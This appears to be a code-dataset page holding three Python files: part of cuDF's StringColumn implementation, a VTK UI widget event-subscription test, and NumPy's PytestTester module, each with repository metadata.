from cudf.core import Series
return Series(
self._parent.nvstrings.replace(pat, repl, n=n, regex=regex),
index=self._index,
name=self._name,
)
def lower(self):
"""
Convert strings in the Series/Index to lowercase.
Returns
-------
Series/Index of str dtype
A copy of the object with all strings converted to lowercase.
"""
from cudf.core import Series
return Series(
self._parent.nvstrings.lower(), index=self._index, name=self._name
)
def split(self, pat=None, n=-1, expand=True):
"""
Split strings around given separator/delimiter.
Splits the string in the Series/Index from the beginning, at the
specified delimiter string.
Parameters
----------
pat : str, default ' ' (space)
String to split on, does not yet support regular expressions.
n : int, default -1 (all)
Limit number of splits in output. `None`, 0, and -1 will all be
interpreted as "all splits".
Returns
-------
DataFrame
Returns a DataFrame with each split as a column.
Notes
-----
The parameter `expand` is not yet supported and will raise a
NotImplementedError if anything other than the default value is set.
"""
if expand is not True:
raise NotImplementedError("`expand` parameter is not supported")
# Pandas treats 0 as all
if n == 0:
n = -1
from cudf.core import DataFrame
out_df = DataFrame(index=self._index)
out = self._parent.nvstrings.split(delimiter=pat, n=n)
for idx, val in enumerate(out):
out_df[idx] = val
return out_df
class StringColumn(column.ColumnBase):
    """Implements operations for Columns of String type
    """
    def __init__(self, mask=None, size=None, offset=0, children=()):
        """
        Parameters
        ----------
        mask : Buffer
            The validity mask
        offset : int
            Data offset
        children : Tuple[Column]
            Two non-null columns containing the string data and offsets
            respectively
        """
        dtype = np.dtype("object")
        if size is None:
            if len(children) == 0:
                size = 0
            elif children[0].size == 0:
                size = 0
            else:
                # one less because the last element of offsets is the number of
                # bytes in the data buffer
                size = children[0].size - 1
            size = size - offset
        super().__init__(
            None, size, dtype, mask=mask, offset=offset, children=children
        )
        # Lazily-built device-side views; invalidated whenever the mask or
        # children change (see set_base_mask / set_base_children).
        self._nvstrings = None
        self._nvcategory = None
        self._indices = None
    @property
    def base_size(self):
        # Row count implied by the base offsets child: the offsets column
        # holds rows + 1 entries, hence the "- 1".
        if len(self.base_children) == 0:
            return 0
        else:
            return int(
                (self.base_children[0].size - 1)
                / self.base_children[0].dtype.itemsize
            )
    def set_base_data(self, value):
        # String columns keep their payload in children, never in `data`.
        if value is not None:
            raise RuntimeError(
                "StringColumns do not use data attribute of Column, use "
                "`set_base_children` instead"
            )
        else:
            super().set_base_data(value)
    def set_base_mask(self, value):
        # Changing the mask invalidates every cached device-side view.
        super().set_base_mask(value)
        self._indices = None
        self._nvcategory = None
        self._nvstrings = None
    def set_base_children(self, value):
        # TODO: Implement dtype validation of the children here somehow
        # Changing the children invalidates every cached device-side view.
        super().set_base_children(value)
        self._indices = None
        self._nvcategory = None
        self._nvstrings = None
    @property
    def children(self):
        # Materialize (offsets, chars) children adjusted for this column's
        # offset into the base buffers; cached after the first access.
        if self._children is None:
            if len(self.base_children) == 0:
                self._children = ()
            elif self.offset == 0 and self.base_children[0].size == (
                self.size + 1
            ):
                # No slicing applied: the base children can be used as-is.
                self._children = self.base_children
            else:
                # First get the base columns for chars and offsets
                chars_column = self.base_children[1]
                offsets_column = self.base_children[0]
                # Shift offsets column by the parent offset.
                offsets_column = column.build_column(
                    data=offsets_column.base_data,
                    dtype=offsets_column.dtype,
                    mask=offsets_column.base_mask,
                    size=self.size + 1,
                    offset=self.offset,
                )
                # Now run a subtraction binary op to shift all of the offsets
                # by the respective number of characters relative to the
                # parent offset
                chars_offset = offsets_column[0]
                offsets_column = offsets_column.binary_operator(
                    "sub", offsets_column.dtype.type(chars_offset)
                )
                # Shift the chars offset by the new first element of the
                # offsets column
                chars_size = offsets_column[self.size]
                chars_column = column.build_column(
                    data=chars_column.base_data,
                    dtype=chars_column.dtype,
                    mask=chars_column.base_mask,
                    size=chars_size,
                    offset=chars_offset,
                )
                self._children = (offsets_column, chars_column)
        return self._children
    def __contains__(self, item):
        # Exact-match membership via an anchored regex over every row.
        return True in self.str().contains(f"^{item}$")._column
    def __reduce__(self):
        # Pickle support: round-trip through a host-side Arrow array.
        cpumem = self.to_arrow()
        return column.as_column, (cpumem, False, np.dtype("object"))
    def str(self, index=None, name=None):
        # Accessor exposing the string methods (.contains, .replace, ...).
        return StringMethods(self, index=index, name=name)
    def __sizeof__(self):
        # Sum the sizes of the offsets and chars children plus the mask.
        n = 0
        if len(self.base_children) == 2:
            n += (
                self.base_children[0].__sizeof__()
                + self.base_children[1].__sizeof__()
            )
        if self.base_mask is not None:
            n += self.base_mask.size
        return n
    def _memory_usage(self, deep=False):
        if deep:
            return self.__sizeof__()
        else:
            return self.str().size() * self.dtype.itemsize
    def __len__(self):
        return self.size
    @property
    def nvstrings(self):
        # Lazily build the device-side nvstrings view from the chars and
        # offsets children (children[1] is chars, children[0] is offsets).
        if self._nvstrings is None:
            if self.nullable:
                mask_ptr = self.mask_ptr
            else:
                mask_ptr = None
            if self.size == 0:
                self._nvstrings = nvstrings.to_device([])
            else:
                self._nvstrings = nvstrings.from_offsets(
                    self.children[1].data_ptr,
                    self.children[0].data_ptr,
                    self.size,
                    mask_ptr,
                    ncount=self.null_count,
                    bdevmem=True,
                )
        return self._nvstrings
    @property
    def nvcategory(self):
        # Lazily build the categorical view over the nvstrings data.
        if self._nvcategory is None:
            import nvcategory as nvc
            self._nvcategory = nvc.from_strings(self.nvstrings)
        return self._nvcategory
    @nvcategory.setter
    def nvcategory(self, nvc):
        self._nvcategory = nvc
    def _set_mask(self, value):
        # Invalidate cached device views before applying the new mask.
        self._nvstrings = None
        self._nvcategory = None
        self._indices = None
        super()._set_mask(value)
    @property
    def indices(self):
        # int32 category codes for each row, computed on device and cached.
        if self._indices is None:
            out_dev_arr = rmm.device_array(
                self.nvcategory.size(), dtype="int32"
            )
            ptr = libcudf.cudf.get_ctype_ptr(out_dev_arr)
            self.nvcategory.values(devptr=ptr)
            self._indices = out_dev_arr
        return self._indices
    @property
    def _nbytes(self):
        # Byte count of the character data (size of the chars child).
        if self.size == 0:
            return 0
        else:
            return self.children[1].size
    def as_numerical_column(self, dtype, **kwargs):
        # Cast strings to a numeric/datetime column via the typecast table.
        mem_dtype = np.dtype(dtype)
        str_dtype = mem_dtype
        out_dtype = mem_dtype
        if mem_dtype.type is np.datetime64:
            if "format" not in kwargs:
                if len(self.nvstrings) > 0:
                    # infer on host from the first not na element
                    fmt = pd.core.tools.datetimes._guess_datetime_format(
                        self[self.notna()][0]
                    )
                    kwargs.update(format=fmt)
        kwargs.update(dtype=out_dtype)
        return _str_to_numeric_typecast_functions[str_dtype](self, **kwargs)
    def as_datetime_column(self, dtype, **kwargs):
        # Datetime conversion shares the numeric-cast path above.
        return self.as_numerical_column(dtype, **kwargs)
    def as_string_column(self, dtype, **kwargs):
        # Already a string column: no conversion needed.
        return self
    def to_arrow(self):
        # Copy chars, offsets and validity to host buffers and wrap them
        # as an Arrow StringArray (or NullArray if everything is null).
        sbuf = np.empty(self.nvstrings.byte_count(), dtype="int8")
        obuf = np.empty(len(self.nvstrings) + 1, dtype="int32")
        mask_size = bitmask_allocation_size_bytes(len(self.nvstrings))
        nbuf = np.empty(mask_size, dtype="i1")
        self.str().to_offsets(sbuf, obuf, nbuf=nbuf)
        sbuf = pa.py_buffer(sbuf)
        obuf = pa.py_buffer(obuf)
        nbuf = pa.py_buffer(nbuf)
        if self.null_count == len(self):
            return pa.NullArray.from_buffers(
                pa.null(), len(self), [pa.py_buffer((b""))], self.null_count
            )
        else:
            return pa.StringArray.from_buffers(
                len(self.nvstrings),
                obuf,
                sbuf,
                nbuf,
                self.nvstrings.null_count(),
            )
    def to_pandas(self, index=None):
        # Host conversion goes through Arrow; attach the index if given.
        pd_series = self.to_arrow().to_pandas()
        if index is not None:
            pd_series.index = index
        return pd_series
    def to_array(self, fillna=None):
        """Get a dense numpy array for the data.
        Notes
        -----
        if ``fillna`` is ``None``, null values are skipped. Therefore, the
        output size could be smaller.
        Raises
        ------
        ``NotImplementedError`` if there are nulls
        """
        if fillna is not None:
            warnings.warn("fillna parameter not supported for string arrays")
        return self.to_arrow().to_pandas().values
    def serialize(self):
        # Serialize the children (offsets, chars) and, if present, the
        # validity mask; the headers carry everything needed to rebuild.
        header = {"null_count": self.null_count}
        header["type-serialized"] = pickle.dumps(type(self))
        frames = []
        sub_headers = []
        for item in self.children:
            sheader, sframes = item.serialize()
            sub_headers.append(sheader)
            frames.extend(sframes)
        if self.null_count > 0:
            frames.append(self.mask)
        header["subheaders"] = sub_headers
        header["frame_count"] = len(frames)
        return header, frames
    @classmethod
    def deserialize(cls, header, frames):
        # Deserialize the mask, value, and offset frames
        buffers = [Buffer(each_frame) for each_frame in frames]
        if header["null_count"] > 0:
            # Frame layout when nulls exist: [offsets, chars, mask].
            nbuf = buffers[2]
        else:
            nbuf = None
        children = []
        for h, b in zip(header["subheaders"], buffers[:2]):
            column_type = pickle.loads(h["type-serialized"])
            children.append(column_type.deserialize(h, [b]))
        col = column.build_column(
            data=None, dtype="str", mask=nbuf, children=tuple(children)
        )
        return col
    def sort_by_values(self, ascending=True, na_position="last"):
        # NOTE(review): nullfirst is unbound if na_position is anything
        # other than "last"/"first" -- callers appear to pass only these
        # two values; confirm before relying on other inputs.
        if na_position == "last":
            nullfirst = False
        elif na_position == "first":
            nullfirst = True
        idx_dev_arr = rmm.device_array(len(self), dtype="int32")
        dev_ptr = libcudf.cudf.get_ctype_ptr(idx_dev_arr)
        self.nvstrings.order(
            2, asc=ascending, nullfirst=nullfirst, devptr=dev_ptr
        )
        # Gather the sorted keys through the computed index permutation.
        col_inds = column.build_column(
            Buffer(idx_dev_arr), idx_dev_arr.dtype, mask=None
        )
        col_keys = self[col_inds.data_array_view]
        return col_keys, col_inds
    def copy(self, deep=True):
        # NOTE(review): `deep` is ignored; nvstrings.copy() is always used.
        return column.as_column(self.nvstrings.copy())
    def unordered_compare(self, cmpop, rhs):
        # Elementwise comparison delegated to the module-level binop helper.
        return _string_column_binop(self, rhs, op=cmpop)
    def find_and_replace(self, to_replace, replacement, all_nan):
        """
        Return col with *to_replace* replaced with *value*
        """
        to_replace = column.as_column(to_replace)
        replacement = column.as_column(replacement)
        if len(to_replace) == 1 and len(replacement) == 1:
            # Only scalar-for-scalar replacement is implemented: pull both
            # values to host and delegate to nvstrings.replace.
            to_replace = to_replace.nvstrings.to_host()[0]
            replacement = replacement.nvstrings.to_host()[0]
            result = self.nvstrings.replace(to_replace, replacement)
            return column.as_column(result)
        else:
            raise NotImplementedError(
                "StringColumn currently only supports replacing"
                " single values"
            )
    def fillna(self, fill_value):
        """
        Fill null values with * fill_value *
        """
        from cudf.core.series import Series
        if not isinstance(fill_value, str) and not (
            isinstance(fill_value, Series)
            and isinstance(fill_value._column, StringColumn)
        ):
            raise TypeError("fill_value must be a string or a string series")
        # replace fill_value with nvstrings
        # if it is a column
        if isinstance(fill_value, Series):
            if len(fill_value) < len(self):
                raise ValueError(
                    "fill value series must be of same or "
                    "greater length than the series to be filled"
                )
            fill_value = fill_value[: len(self)]._column.nvstrings
        filled_data = self.nvstrings.fillna(fill_value)
        result = column.as_column(filled_data)
        # All nulls are filled now, so drop the validity mask entirely.
        result = result.set_mask(None)
        return result
    def _find_first_and_last(self, value):
        # Anchored regex gives a bool column; cast to int32 so the first
        # and last `1` mark the first/last exact match positions.
        found_indices = self.str().contains(f"^{value}$")._column
        found_indices = libcudfxx.unary.cast(found_indices, dtype=np.int32)
        first = column.as_column(found_indices).find_first_value(1)
        last = column.as_column(found_indices).find_last_value(1)
        return first, last
    def find_first_value(self, value, closest=False):
        # `closest` is accepted for interface parity but unused here.
        return self._find_first_and_last(value)[0]
    def find_last_value(self, value, closest=False):
        # `closest` is accepted for interface parity but unused here.
        return self._find_first_and_last(value)[1]
    def unique(self, method="sort"):
        """
        Get unique strings in the data
        """
        import nvcategory as nvc
        return column.as_column(nvc.from_strings(self.nvstrings).keys())
    def normalize_binop_value(self, other):
        # Coerce the RHS of a binary op into a string column of equal
        # length; scalars (str or None) are broadcast.
        if isinstance(other, column.Column):
            return other.astype(self.dtype)
        elif isinstance(other, str) or other is None:
            col = utils.scalar_broadcast_to(
                other, size=len(self), dtype="object"
            )
            return col
        else:
            raise TypeError("cannot broadcast {}".format(type(other)))
    def default_na_value(self):
        # Missing strings are represented as None.
        return None
    def binary_operator(self, binop, rhs, reflect=False):
        # Only string concatenation ("add") is supported; `reflect` swaps
        # the operand order for r-ops (e.g. rhs + self).
        lhs = self
        if reflect:
            lhs, rhs = rhs, lhs
        if isinstance(rhs, StringColumn) and binop == "add":
            return lhs.nvstrings.cat(others=rhs.nvstrings)
        else:
            msg = "{!r} operator not supported between {} and {}"
            raise TypeError(msg.format(binop, type(self), type(rhs)))
    def sum(self, dtype=None):
        # dtype is irrelevant it is needed to be in sync with
        # the sum method for Numeric Series
        return self.nvstrings.join().to_host()[0]
    @property
    def is_unique(self):
        return len(self.unique()) == len(self)
    @property
    def is_monotonic_increasing(self):
        # Cached on first access; columns containing nulls are treated as
        # non-monotonic.
        if not hasattr(self, "_is_monotonic_increasing"):
            if self.nullable and self.has_nulls:
                self._is_monotonic_increasing = False
            else:
                self._is_monotonic_increasing = libcudf.issorted.issorted(
                    columns=[self]
                )
        return self._is_monotonic_increasing
    @property
    def is_monotonic_decreasing(self):
        # Cached on first access; columns containing nulls are treated as
        # non-monotonic.
        if not hasattr(self, "_is_monotonic_decreasing"):
            if self.nullable and self.has_nulls:
                self._is_monotonic_decreasing = False
            else:
                self._is_monotonic_decreasing = libcudf.issorted.issorted(
                    columns=[self], descending=[1]
                )
        return self._is_monotonic_decreasing
    @property
    def __cuda_array_interface__(self):
        raise NotImplementedError(
            "Strings are not yet supported via `__cuda_array_interface__`"
        )
    def _mimic_inplace(self, other_col, inplace=False):
        # For in-place mimicry, also adopt the other column's cached
        # device-side views so they stay consistent with the new data.
        out = super()._mimic_inplace(other_col, inplace=inplace)
        if inplace:
            self._nvstrings = other_col._nvstrings
            self._nvcategory = other_col._nvcategory
            self._indices = other_col._indices
        return out
def _string_column_binop(lhs, rhs, op):
    """Apply the elementwise binary comparison `op` between two string
    columns, returning a boolean column.

    The result carries a validity mask whenever either input is nullable.
    """
    nvtx_range_push("CUDF_BINARY_OP", "orange")
    # Allocate output
    masked = lhs.nullable or rhs.nullable
    out = column.column_empty_like(lhs, dtype="bool", masked=masked)
    # Call and fix null_count
    _ = libcudf.binops.apply_op(lhs=lhs, rhs=rhs, out=out, op=op)
    nvtx_range_pop()
    return out
| 33.849462 | 79 | 0.574206 |
acfa9f951f40bb32b39dcd686cd414f85f59ee6f | 2,132 | py | Python | testing/vcs/vtk_ui/test_vtk_ui_widget_subscribe_unsubscribe.py | xylar/cdat | 8a5080cb18febfde365efc96147e25f51494a2bf | [
"BSD-3-Clause"
] | 62 | 2018-03-30T15:46:56.000Z | 2021-12-08T23:30:24.000Z | testing/vcs/vtk_ui/test_vtk_ui_widget_subscribe_unsubscribe.py | xylar/cdat | 8a5080cb18febfde365efc96147e25f51494a2bf | [
"BSD-3-Clause"
] | 114 | 2018-03-21T01:12:43.000Z | 2021-07-05T12:29:54.000Z | testing/vcs/vtk_ui/test_vtk_ui_widget_subscribe_unsubscribe.py | CDAT/uvcdat | 5133560c0c049b5c93ee321ba0af494253b44f91 | [
"BSD-3-Clause"
] | 14 | 2018-06-06T02:42:47.000Z | 2021-11-26T03:27:00.000Z | """
Test widget event subscribe / unsubscribe
"""
import vcs.vtk_ui
import vtk
from vtk_ui_test import vtk_ui_test
class test_vtk_ui_widget_subscribe_unsubscribe(vtk_ui_test):
    # Exercises Widget.subscribe/unsubscribe: registration, duplicate
    # detection, single and multiple unsubscription.  NOTE: this file is
    # Python 2 (`print` statements).
    def do_test(self):
        self.win.SetSize((100, 100))
        # Build a minimal textured button widget to attach listeners to.
        vw = vtk.vtkButtonWidget()
        vr = vtk.vtkTexturedButtonRepresentation2D()
        vr.SetNumberOfStates(1)
        r = vtk.vtkPNGReader()
        r.SetFileName("Pepper.png")
        r.Update()
        image = r.GetOutput()
        vr.SetButtonTexture(0, image)
        vw.SetRepresentation(vr)
        w = vcs.vtk_ui.widget.Widget(self.inter, vw)
        w.show()
        # No-op callback used as the subscription target.
        def dummy(*args, **kwargs):
            pass
        w.subscribe("StartInteractionEvent", dummy)
        # Make sure event was properly subscribed to
        assert "StartInteractionEvent" in w.subscriptions, "Event not in subscriptions"
        # Check observers of w for the tag in w.subscriptions
        tag = w.subscriptions["StartInteractionEvent"]
        c = vw.GetCommand(tag)
        assert c is not None, "Listener not attached to widget"
        # Subscribing twice to the same event must raise KeyError.
        try:
            w.subscribe("StartInteractionEvent", dummy)
            print "Failed to notice double event subscription on widget"
            return
        except KeyError:
            pass
        w.unsubscribe("StartInteractionEvent")
        assert "StartInteractionEvent" not in w.subscriptions, "Did not remove event from subscriptions on unsubscribe"
        # Test multiple unsubscriptions
        w.subscribe("EndInteractionEvent", dummy)
        w.subscribe("StartInteractionEvent", dummy)
        w.unsubscribe("StartInteractionEvent", "EndInteractionEvent")
        assert "EndInteractionEvent" not in w.subscriptions and "StartInteractionEvent" not in w.subscriptions, "Did not remove both events from widget subscriptions"
        # Unsubscribing an event that is no longer registered must raise.
        try:
            w.unsubscribe("StartInteractionEvent")
            print "Failed to notice double unsubscribe on widget"
            return
        except KeyError:
            pass
        # Convention of the vtk_ui_test harness: 0 marks success.
        self.passed = 0
if __name__ == "__main__":
    # Run this test directly when the file is executed as a script.
    test_vtk_ui_widget_subscribe_unsubscribe().test()
| 31.352941 | 166 | 0.655253 |
acfaa1ca54a15a9c963ea0308048fa5d8af49f9d | 6,302 | py | Python | venv/Lib/site-packages/numpy/_pytesttester.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 7 | 2022-01-16T12:28:16.000Z | 2022-03-04T15:31:45.000Z | venv/Lib/site-packages/numpy/_pytesttester.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 150 | 2019-09-30T11:22:36.000Z | 2021-08-02T06:19:29.000Z | venv/Lib/site-packages/numpy/_pytesttester.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 20 | 2021-11-07T13:55:56.000Z | 2021-12-02T10:54:01.000Z | """
Pytest test running.
This module implements the ``test()`` function for NumPy modules. The usual
boiler plate for doing that is to put the following in the module
``__init__.py`` file::
from numpy._pytesttester import PytestTester
test = PytestTester(__name__)
del PytestTester
Warnings filtering and other runtime settings should be dealt with in the
``pytest.ini`` file in the numpy repo root. The behavior of the test depends on
whether or not that file is found as follows:
* ``pytest.ini`` is present (develop mode)
All warnings except those explicitly filtered out are raised as error.
* ``pytest.ini`` is absent (release mode)
DeprecationWarnings and PendingDeprecationWarnings are ignored, other
warnings are passed through.
In practice, tests run from the numpy repo are run in develop mode. That
includes the standard ``python runtests.py`` invocation.
This module is imported by every numpy subpackage, so lies at the top level to
simplify circular import issues. For the same reason, it contains no numpy
imports at module scope, instead importing numpy within function calls.
"""
import sys
import os
__all__ = ['PytestTester']
def _show_numpy_info():
    """Print the NumPy version, the relaxed-strides setting and the
    enabled CPU features to stdout."""
    import numpy as np

    print("NumPy version %s" % np.__version__)
    # A column vector is F-contiguous only under relaxed strides checking.
    relaxed = np.ones((10, 1), order="C").flags.f_contiguous
    print("NumPy relaxed strides checking option:", relaxed)
    cpu_features = np.lib.utils._opt_info()
    if cpu_features:
        print("NumPy CPU features: ", cpu_features)
    else:
        print("NumPy CPU features: ", 'nothing enabled')
class PytestTester:
    """
    Pytest test runner.
    A test function is typically added to a package's __init__.py like so::
      from numpy._pytesttester import PytestTester
      test = PytestTester(__name__).test
      del PytestTester
    Calling this test function finds and runs all tests associated with the
    module and all its sub-modules.
    Attributes
    ----------
    module_name : str
        Full path to the package to test.
    Parameters
    ----------
    module_name : module name
        The name of the module to test.
    Notes
    -----
    Unlike the previous ``nose``-based implementation, this class is not
    publicly exposed as it performs some ``numpy``-specific warning
    suppression.
    """
    def __init__(self, module_name):
        self.module_name = module_name
    def __call__(self, label='fast', verbose=1, extra_argv=None,
                 doctests=False, coverage=False, durations=-1, tests=None):
        """
        Run tests for module using pytest.
        Parameters
        ----------
        label : {'fast', 'full'}, optional
            Identifies the tests to run. When set to 'fast', tests decorated
            with `pytest.mark.slow` are skipped, when 'full', the slow marker
            is ignored.
        verbose : int, optional
            Verbosity value for test outputs, in the range 1-3. Default is 1.
        extra_argv : list, optional
            List with any extra arguments to pass to pytests.
        doctests : bool, optional
            .. note:: Not supported
        coverage : bool, optional
            If True, report coverage of NumPy code. Default is False.
            Requires installation of (pip) pytest-cov.
        durations : int, optional
            If < 0, do nothing, If 0, report time of all tests, if > 0,
            report the time of the slowest `timer` tests. Default is -1.
        tests : test or list of tests
            Tests to be executed with pytest '--pyargs'
        Returns
        -------
        result : bool
            Return True on success, false otherwise.
        Notes
        -----
        Each NumPy module exposes `test` in its namespace to run all tests for
        it. For example, to run all tests for numpy.lib:
        >>> np.lib.test() #doctest: +SKIP
        Examples
        --------
        >>> result = np.lib.test() #doctest: +SKIP
        ...
        1023 passed, 2 skipped, 6 deselected, 1 xfailed in 10.39 seconds
        >>> result
        True
        """
        import pytest
        import warnings
        module = sys.modules[self.module_name]
        module_path = os.path.abspath(module.__path__[0])
        # setup the pytest arguments
        pytest_args = ["-l"]
        # offset verbosity. The "-q" cancels a "-v".
        pytest_args += ["-q"]
        # Filter out distutils cpu warnings (could be localized to
        # distutils tests). ASV has problems with top level import,
        # so fetch module for suppression here.
        with warnings.catch_warnings():
            warnings.simplefilter("always")
            from numpy.distutils import cpuinfo
        # Filter out annoying import messages. Want these in both develop and
        # release mode.
        pytest_args += [
            "-W ignore:Not importing directory",
            "-W ignore:numpy.dtype size changed",
            "-W ignore:numpy.ufunc size changed",
            "-W ignore::UserWarning:cpuinfo",
            ]
        # When testing matrices, ignore their PendingDeprecationWarnings
        pytest_args += [
            "-W ignore:the matrix subclass is not",
            "-W ignore:Importing from numpy.matlib is",
        ]
        if doctests:
            raise ValueError("Doctests not supported")
        if extra_argv:
            pytest_args += list(extra_argv)
        if verbose > 1:
            # One extra "-v" per verbosity level above 1.
            pytest_args += ["-" + "v"*(verbose - 1)]
        if coverage:
            pytest_args += ["--cov=" + module_path]
        if label == "fast":
            # not importing at the top level to avoid circular import of module
            from numpy.testing import IS_PYPY
            if IS_PYPY:
                pytest_args += ["-m", "not slow and not slow_pypy"]
            else:
                pytest_args += ["-m", "not slow"]
        elif label != "full":
            # Any other label is forwarded verbatim as a pytest marker.
            pytest_args += ["-m", label]
        if durations >= 0:
            pytest_args += ["--durations=%s" % durations]
        if tests is None:
            tests = [self.module_name]
        pytest_args += ["--pyargs"] + list(tests)
        # run tests.
        _show_numpy_info()
        try:
            code = pytest.main(pytest_args)
        except SystemExit as exc:
            # pytest.main may raise SystemExit; recover its exit status.
            code = exc.code
        return code == 0
| 31.19802 | 79 | 0.610124 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.